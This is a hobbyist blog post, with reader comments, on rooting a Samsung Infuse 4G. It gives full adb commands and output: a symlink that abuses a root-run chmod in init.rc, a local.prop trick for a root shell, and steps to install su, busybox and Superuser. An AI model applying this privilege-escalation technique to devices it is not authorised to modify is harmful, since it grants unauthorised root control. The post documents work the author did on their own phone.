I received a Samsung Infuse 4G this year for Christmas, and one of the first questions I had was how to let this bad boy run free. Doing a little searching around, it looked like the device was already rootable by the RageAgainstTheCage exploit by the Android Exploid Crew, but of course using an already-written, pre-compiled exploit is too boring.
Note, before we even begin, the device should be placed into USB debugging mode so we can interact with it from a shell (via the ADB – Android Debug Bridge).
After some snooping around, I noticed that the device was vulnerable to a flaw similar to the ones Dan Rosenberg found with the Droid 3 and Admire. In the init.rc script (which is run at startup as root), we see the following command:
# Permission for WMDRM sample.hds file chmod 0777 /data/data/.drm/.wmdrm/sample.hds
The sample.hds file doesn’t actually exist, but that fact is irrelevant to the situation. The interesting thing here is that the .wmdrm directory is also 0777, so we have full control over its contents. Let’s create a symlink to /data where sample.hds is supposed to be and reboot:
$ ln -s /data /data/data/.drm/.wmdrm/sample.hds $ ls -l /data/data/.drm/.wmdrm/sample.hds lrwxrwxrwx shell shell 2012-01-02 20:13 sample.hds -> /data $ exit sh-4.1$ ./adb reboot sh-4.1$ ./adb shell $ ls -l drwxrwx--x system system 2012-01-02 20:14 dbdata dr-x------ root root 2012-01-02 20:14 config drwxrwx--- system cache 2012-01-02 20:14 cache drwxrwx--x radio radio 2012-01-02 20:14 efs lrwxrwxrwx root root 2012-01-02 20:14 sdcard -> /mnt/sdcard drwxr-xr-x root root 2012-01-02 20:14 acct drwxrwxr-x root system 2012-01-02 20:14 mnt lrwxrwxrwx root root 2012-01-02 20:14 d -> /sys/kernel/debug lrwxrwxrwx root root 2012-01-02 20:14 etc -> /system/etc drwxr-xr-x root root 2012-01-02 20:14 system drwxrwxrwx system system 2012-01-02 20:14 data drwxr-xr-x root root 1969-12-31 19:00 sys drwxr-xr-x root root 2011-08-03 23:33 modules dr-xr-xr-x root root 1969-12-31 19:00 proc drwxr-xr-x root root 2012-01-02 20:14 dev -rwxr-xr-x root root 12127 2010-08-12 10:06 recovery.rc -rwxr-xr-x root root 945 2010-08-27 09:41 lpm.rc -rw-r--r-- root root 25100 2011-03-17 02:00 init.rc drwxr-xr-x root root 2011-08-03 23:33 res drwxr-xr-x root root 2011-08-03 23:33 lib drwxr-xr-x root root 2011-08-03 23:33 sbin -rw-r--r-- root root 118 2011-08-03 23:13 default.prop -rw-r--r-- root root 1677 2010-07-06 15:13 init.goldfish.rc -rw-r--r-- root root 2378 2010-12-14 23:01 fota.rc -rwxr-xr-x root root 379 2010-05-28 03:06 init.smdkc110.rc -rwxr-xr-x root root 133016 2011-08-03 23:19 init $
Our symlink was followed, and now the /data directory is 0777! From here we’ll create a /data/local.prop file with a configuration setting to not drop privileges when spawning a shell:
$ echo ro.kernel.qemu=1 > /data/local.prop $ exit sh-4.1$ ./adb reboot sh-4.1$
After restarting, the phone refuses to boot and vibrates a bunch due to parsing the ro.kernel.qemu property. We told the device it was running in an emulator when it’s actually still running on hardware, leading to confusion. However, we are still able to spawn a shell with adb:
sh-4.1$ ./adb shell # id uid=0(root) gid=2000(shell) groups=1007(log) #
Success! For persistence, we’ll follow the typical song and dance and copy over some binaries and install the Superuser app:
# mount -o rw,remount /dev/stl9 /system # exit sh-4.1$ ./adb push su /system/bin 233 KB/s (26264 bytes in 0.109s) sh-4.1$ ./adb push busybox /system/bin 500 KB/s (1867568 bytes in 3.646s) sh-4.1$ ./adb install Superuser.apk 449 KB/s (196521 bytes in 0.427s) pkg: /data/local/tmp/Superuser.apk ^C sh-4.1$ ./adb shell # chmod 4755 /system/bin/su /system/bin/busybox #
Clean up our files and reboot the device:
# rm /data/local.prop # rm /data/data/.drm/.wmdrm/sample.hds # reboot sh-4.1$
Running `su` in the adb shell, as well as apps for rooted phones, will now prompt the user (on the phone itself) to grant root privileges to the process. This selection can be remembered for future use.
A one-click root script for Linux is available here: https://github.com/mncoppola/Infuse-4G-root. If this exploit works for other phones, contact me and I’ll update the post.
Thanks to Dan Rosenberg for his tips and guidance throughout the process.
Pingback: Rooting the Samsung Infuse: Just Change a File Permission – flyingpenguin
Do you have the unroot software for windows platform?
SuperOneClick runs on Windows and should have an unroot button
Do you have a root for a Samsung galaxy precedent. I’ve tried a few with no success.
Sorry, I don’t have a root exploit for that device. The only device I’ve been able to test so far is the Infuse 4G.
have tried your method a couple times now to no avail, this is all I get:
Waiting until device is ready
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
Creating symbolic link
link failed No such file or directory
Rebooting, waiting until device is ready
cannot create /data/local.prop: permission denied
Rebooting, waiting until device is ready
mount: Operation not permitted
Installing persistence apps
failed to copy ‘dependencies/su’ to ‘/system/bin/su’: Read-only file system
failed to copy ‘dependencies/busybox’ to ‘/system/bin/busybox’: Read-only file system
Unable to chmod /system/bin/su: No such file or directory
failed to copy ‘dependencies/Superuser.apk’ to ‘/system/app/Superuser.apk’: Read-only file system
Cleaning up files
rm failed for /data/local.prop, No such file or directory
rm failed for /data/data/.drm/.wmdrm/sample.hds, No such file or directory
Finished – Enjoy!
my phone does reboot once or twice during the process
Would you mind posting the model number and build number of your device?
Settings > About phone
You do have an Infuse 4G but it unfortunately seems like Rogers made custom modifications to the device that removed (or at least changed) the bug. I wrote the exploit to work against my own device, an SGH-I997 FROYO-UCKH1.
You might want to try these methods instead:
i figured it was Roger’s fault lol, I’ve had no luck rooting this damn phone, I’ve tried several different methods and with no access to a windows machine I have limited options. I’ll try the above threads and let you know, thanks for your help.